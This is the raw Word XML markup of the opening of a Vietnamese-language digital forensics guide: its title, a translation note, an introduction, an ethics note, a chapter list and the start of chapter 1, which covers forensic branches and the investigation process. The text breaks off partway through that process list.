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A65021">
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:spacing w:before="1040"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ĐIỀU TRA SỐ - HƯỚNG DẪN TOÀN DIỆN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F106D3E">
      <w:pPr>
        <w:pStyle w:val="23"/>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Từ nguyên lý cơ bản đến vai trò nhân chứng chuyên gia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F239D6A">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing w:before="360" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="567"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEB8208">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing w:before="360" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="567"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4798D4EB">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing w:before="360" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="567"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7533966F">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing w:before="360" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="567"/>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Ghi chú về bản dịch:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nội dung chuyên môn đã được chuyển sang tiếng Việt. Tên công cụ, lệnh, đường dẫn, Event ID, tên trường dữ liệu và đầu ra kỹ thuật được giữ nguyên để người học có thể thực hành trực tiếp. Một số thuật ngữ tiếng Anh quan trọng được giữ trong ngoặc ở lần xuất hiện đầu tiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FFE23">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="giới-thiệu"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EE3DC">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Điều tra số là lĩnh vực nằm tại giao điểm của khoa học máy tính, phương pháp điều tra và thủ tục pháp lý. Tài liệu này xây dựng kiến thức từ những nguyên lý đầu tiên - chứng cứ số là gì, được bảo toàn như thế nào - đến các kỹ thuật phân tích thực hành bằng công cụ tiêu chuẩn của ngành và việc trình bày kết luận với tư cách nhân chứng chuyên gia trước tòa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2662B">
      <w:pPr>
        <w:pStyle w:val="3"/>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Mỗi chương có các phiên terminal minh họa dưới tài khoản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>the_cyber_bite@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, thể hiện chuỗi lệnh và cách phát hiện chứng cứ trong tình huống thực tế. Các công cụ, kỹ thuật và phương pháp trong tài liệu được sử dụng trong điều tra hình sự, tranh tụng dân sự, điều tra nội bộ doanh nghiệp và ứng phó sự cố DFIR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CB56B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkStart w:id="1" w:name="lưu-ý-về-đạo-đức-nghề-nghiệp"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Lưu ý về đạo đức nghề nghiệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF21088">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Chuyên viên điều tra số có thể tiếp xúc với những dữ liệu cá nhân nhạy cảm nhất: trao đổi riêng tư, hồ sơ y tế, thông tin tài chính và hình ảnh riêng tư. Mọi chứng cứ phải được xử lý với mức độ chuyên nghiệp mà chính bạn mong muốn nếu đó là dữ liệu của mình. Bảo mật và tính toàn vẹn không chỉ là nghĩa vụ pháp lý mà còn là trách nhiệm nghề nghiệp cốt lõi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="767CA680">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="mục-lục"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Mục lục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24672E13">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Nhập môn điều tra số</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4770F13A">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Khung pháp lý và chuỗi lưu giữ chứng cứ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19192DF0">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Công cụ pháp chứng và môi trường phòng lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C660243">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Pháp chứng ổ đĩa - nền tảng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0021D41A">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Dấu vết pháp chứng trên Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F48BE9">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Pháp chứng bộ nhớ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E4D894">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Pháp chứng mạng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0941E">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Pháp chứng thiết bị di động</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC5096">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Pháp chứng đám mây</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C995A">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Pháp chứng trình duyệt và email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="424AC39D">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Phân tích dòng thời gian và Super Timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A53C0B">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Pháp chứng Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27F83B">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Kỹ thuật chống pháp chứng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E4F99">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Viết báo cáo và làm chứng chuyên gia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFC12D3">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Danh mục công cụ DFIR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="161EBC3F">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Nghề nghiệp, chứng chỉ và lộ trình học tập</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="0F4752D8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="nhập-môn-điều-tra-số"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Nhập môn điều tra số</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D54168">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Phục hồi, bảo toàn và phân tích chứng cứ số bằng phương pháp khoa học.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDB13B0">
      <w:pPr>
        <w:pStyle w:val="3"/>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Điều tra số là việc áp dụng phương pháp khoa học để phục hồi, bảo toàn, kiểm tra, phân tích và trình bày chứng cứ số tìm thấy trên máy tính, thiết bị di động, mạng và môi trường đám mây theo cách có thể được chấp nhận về mặt pháp lý. Lĩnh vực này kết hợp khoa học máy tính, phương pháp điều tra và thủ tục pháp lý để hỗ trợ tố tụng hình sự, tranh tụng dân sự, điều tra doanh nghiệp và ứng phó sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478957EF">
      <w:pPr>
        <w:pStyle w:val="3"/>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Điều tra số hiện đại hình thành từ thập niên 1980, khi cơ quan thực thi pháp luật bắt đầu gặp máy tính trong các vụ án. Ngày nay đây là một ngành trưởng thành với phương pháp chuẩn hóa, chứng chỉ được công nhận quốc tế, phần cứng và phần mềm chuyên dụng cùng nền tảng khoa học chặt chẽ. Chuyên viên không chỉ phải hiểu kỹ thuật mà còn phải hiểu khung pháp lý quyết định việc chứng cứ có được tòa án chấp nhận hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A91D4DE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="các-nhánh-của-điều-tra-số"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1.1. Các nhánh của điều tra số</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2375"/>
        <w:gridCol w:w="7671"/>
      </w:tblGrid>
      <w:tr w14:paraId="0CF6873C">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2510AD6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Nhánh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13C66C2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Ý nghĩa pháp chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1B2B8392">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67D7E23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Pháp chứng máy tính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1980393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Phân tích máy bàn, laptop và máy chủ: hệ thống tệp, dữ liệu đã xóa và dấu vết hệ thống.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A8FD0D3">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575A0DA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Pháp chứng thiết bị di động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28BBF81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Điện thoại, máy tính bảng, thiết bị đeo: nhật ký cuộc gọi, tin nhắn, GPS và dữ liệu ứng dụng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5ADA1D54">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7EBBB06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Pháp chứng mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A0C510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Gói tin, dữ liệu luồng và nhật ký: tái dựng liên lạc và đường xâm nhập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27172A75">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5E02E73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Pháp chứng bộ nhớ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="664AA5D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Phân tích RAM: nội dung đã giải mã, tiến trình đang chạy, khóa mã hóa và mã bị tiêm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6535C926">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708F624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Pháp chứng đám mây</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="623CFE9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Chứng cứ SaaS/IaaS/PaaS: nhật ký API, lưu trữ đối tượng và ảnh máy ảo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D1658A3">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73DBE5E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Pháp chứng email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="607D93B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Header, tuyến chuyển tiếp, siêu dữ liệu và tệp đính kèm: xác thực và phát hiện giả mạo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4826DC93">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9DFBDF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Pháp chứng cơ sở dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16D5270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SQL/NoSQL: nhật ký giao dịch, bản ghi đã xóa và thay đổi lược đồ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="17E83B35">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0C2FFE1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Pháp chứng IoT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C5F6B1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Thiết bị thông minh, hệ thống nhúng và bộ điều khiển công nghiệp: firmware và dữ liệu cảm biến.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F7ADB7D">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295648D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Pháp chứng mã độc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51893ED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Phân tích hành vi, dịch ngược và quy kết: mã độc hoạt động thế nào và có thể do ai phát triển.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="122D851B">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4C16977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Pháp chứng mạng xã hội</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DD1788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Thu thập nguồn mở: hoạt động tài khoản, bài đăng, mối liên hệ và dấu thời gian.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="4"/>
    </w:tbl>
    <w:p w14:paraId="0ECC5931">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="Xef30137cf3e920dc8bcfab7d91bdb4949b7e5be"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1.2. Quy trình pháp chứng - bốn giai đoạn cốt lõi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2126533E">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Nhận diện:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Xác định nguồn chứng cứ tiềm năng như máy tính, điện thoại, USB, tài khoản đám mây và thiết bị mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644D066">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Thu thập và bảo toàn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thu nhận chứng cứ theo phương pháp pháp chứng đúng chuẩn, duy trì chuỗi lưu giữ và tạo bản sao đã xác minh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0880F0DD">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Kiểm tra và phân tích:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
